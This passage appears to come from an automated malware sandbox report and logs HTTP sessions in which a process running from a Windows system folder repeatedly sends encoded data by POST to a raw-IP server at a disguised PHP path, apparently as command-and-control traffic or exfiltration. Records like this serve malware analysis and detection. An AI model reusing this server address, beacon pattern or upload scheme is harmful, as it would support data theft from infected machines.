                                                                                                                                                                        Jan 3, 2025 07:58:07.271229029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.402940989 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:07 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T
                                                                                                                                                                        Jan 3, 2025 07:58:07.410644054 CET350OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----w7zdkfYFEzY2KpKGQqqzrcAd64jvRvQWOr
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 169482
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.629832983 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.630057096 CET14832OUTData Raw: 2d 2d 2d 2d 2d 2d 77 37 7a 64 6b 66 59 46 45 7a 59 32 4b 70 4b 47 51 71 71 7a 72 63 41 64 36 34 6a 76 52 76 51 57 4f 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                                                        Data Ascii: ------w7zdkfYFEzY2KpKGQqqzrcAd64jvRvQWOrContent-Disposition: form-data; name="0"Content-Type: text/plain^V[_XWPPT[YZ[RW^_QZ_RWPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_
                                                                                                                                                                        Jan 3, 2025 07:58:08.246427059 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:07 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        22 | 192.168.2.4 | 49770 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:07.577133894 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:07.933615923 CET2516OUTData Raw: 5b 51 5e 5d 58 5f 55 58 54 5b 59 5a 5b 51 57 58 5f 50 5a 5a 52 52 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q^]X_UXT[YZ[QWX_PZZRRPAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C+-#:,S2<$@>$4'/!W6')V7^#39;&?,(#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:08.265281916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:08.398668051 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:08 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        23 | 192.168.2.4 | 49776 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:08.538908958 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:08.886769056 CET2516OUTData Raw: 5b 51 5b 5d 58 5a 55 5b 54 5b 59 5a 5b 55 57 53 5f 56 5a 58 52 51 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[]XZU[T[YZ[UWS_VZXRQPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(._!*/2((5%':1R"$6#(#%)<D3?$R?9#Y'$X.)
                                                                                                                                                                        Jan 3, 2025 07:58:09.228909016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:09.360850096 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:09 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        24 | 192.168.2.4 | 49785 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:09.497911930 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:09.855596066 CET2516OUTData Raw: 5e 51 5b 5c 58 5f 50 51 54 5b 59 5a 5b 5e 57 5e 5f 53 5a 5f 52 50 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q[\X_PQT[YZ[^W^_SZ_RPPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<.1]6:S&<0)$415W"4#X394D$?0))#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:10.185713053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:10.314773083 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:10 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        25 | 192.168.2.4 | 49793 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:10.436913967 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:10.793001890 CET2516OUTData Raw: 5b 53 5e 5b 5d 5a 50 58 54 5b 59 5a 5b 51 57 53 5f 54 5a 5d 52 55 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S^[]ZPXT[YZ[QWS_TZ]RUPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>%\6R1<+*Y$$>&5V!79W#4X0:$$?3?#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:11.126877069 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                        26 | 192.168.2.4 | 49799 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                        Jan 3, 2025 07:58:11.205053091 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:11.558619976 CET | 2108 | OUT | Data Raw: 5e 52 5b 5c 5d 5e 55 5c 54 5b 59 5a 5b 5e 57 5f 5f 5d 5a 5f 52 5c 50 41 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R[\]^U\T[YZ[^W__]Z_R\PAZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(X-^!'20D=82^$')Z25!$>#309,D3+9#Y'$X.
Jan 3, 2025 07:58:11.910259008 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:12.046986103 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:11 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 27 02 31 28 39 02 3d 2f 01 59 31 0d 25 13 22 0e 20 5e 3b 09 36 43 36 02 0b 59 26 5d 30 1d 2b 3e 3e 41 3c 33 2e 0d 37 3e 0b 10 28 1a 28 5d 03 10 39 5d 28 03 33 5c 3e 00 0c 06 3a 0e 2f 16 33 37 28 58 29 1d 26 0f 32 2f 3a 1e 21 5b 24 0a 3d 23 2d 59 33 28 3f 04 3c 1e 3f 5f 27 07 20 54 0b 17 27 54 24 30 3b 10 26 28 2d 58 3e 37 12 1f 26 2a 3e 09 23 3c 21 0b 34 17 2c 16 2d 20 29 1f 24 06 36 0a 3e 3d 3f 56 31 3a 36 10 24 01 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: '1(9=/Y1%" ^;6C6Y&]0+>>A<3.7>((]9](3\>:/37(X)&2/:![$=#-Y3(?<?_' T'T$0;&(-X>7&*>#<!4,- )$6>=?V1:6$.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49800 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:11.390618086 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:11.746223927 CET | 2516 | OUT | Data Raw: 5e 51 5e 5c 58 5d 50 50 54 5b 59 5a 5b 50 57 53 5f 55 5a 5b 52 51 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q^\X]PPT[YZ[PWS_UZ[RQP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&C).!#&<B(("'':',!W6* 8?0*4B0;+9#Y'$X.
Jan 3, 2025 07:58:12.089428902 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:12.222568035 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:11 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49806 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:12.347786903 CET | 304 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
Jan 3, 2025 07:58:12.699245930 CET | 2516 | OUT | Data Raw: 5e 51 5b 5c 58 56 50 5e 54 5b 59 5a 5b 54 57 5d 5f 50 5a 5f 52 53 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q[\XVP^T[YZ[TW]_PZ_RSP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>*"*#&$>]>^'4%>"4&#09$B'$V))#Y'$X.-
Jan 3, 2025 07:58:13.056866884 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:13.194523096 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:12 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49814 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:13.325643063 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:13.683656931 CET | 2516 | OUT | Data Raw: 5b 54 5b 58 58 56 50 5a 54 5b 59 5a 5b 51 57 5d 5f 56 5a 5f 52 57 50 40 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [T[XXVPZT[YZ[QW]_VZ_RWP@ZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(=-#*(R1,@*0&&Q"!U#4Z' C$?#Y'$X.9
Jan 3, 2025 07:58:14.024111032 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:14.158556938 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:13 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49823 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:14.281400919 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:14.636755943 CET | 2516 | OUT | Data Raw: 5b 57 5e 5e 5d 5b 55 5b 54 5b 59 5a 5b 56 57 5d 5f 54 5a 54 52 56 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [W^^][U[T[YZ[VW]_TZTRVPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(58%,(+$$9%/!5'9P4/%)3(9#Y'$X.%
Jan 3, 2025 07:58:14.971425056 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:15.098711967 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:14 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49829 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:15.234663010 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
Jan 3, 2025 07:58:15.589934111 CET | 2516 | OUT | Data Raw: 5b 50 5e 5d 58 5a 50 5f 54 5b 59 5a 5b 54 57 53 5f 55 5a 55 52 52 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^]XZP_T[YZ[TWS_UZURRPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D+"#) T2??)-0$Z&6V#800$0S?#Y'$X.-
Jan 3, 2025 07:58:15.931704998 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:16.062494993 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:15 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49835 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:16.185100079 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:16.543001890 CET2516OUTData Raw: 5b 5c 5b 5a 5d 5d 50 50 54 5b 59 5a 5b 51 57 5f 5f 5d 5a 5d 52 52 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [\[Z]]PPT[YZ[QW__]Z]RRPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&(.6 T&+)+'*'/=W 4=V!;0[09+0$()#Y'$X.9
Jan 3, 2025 07:58:16.887893915 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 07:58:17.020055056 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 06:58:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49841 | 86.110.194.28 | 80 | 3300 | C:\Windows\TAPI\ZWgKQlTqcrSB.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 07:58:17.064402103 CET | 328 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 86.110.194.28
Content-Length: 2080
Expect: 100-continue
Connection: Keep-Alive
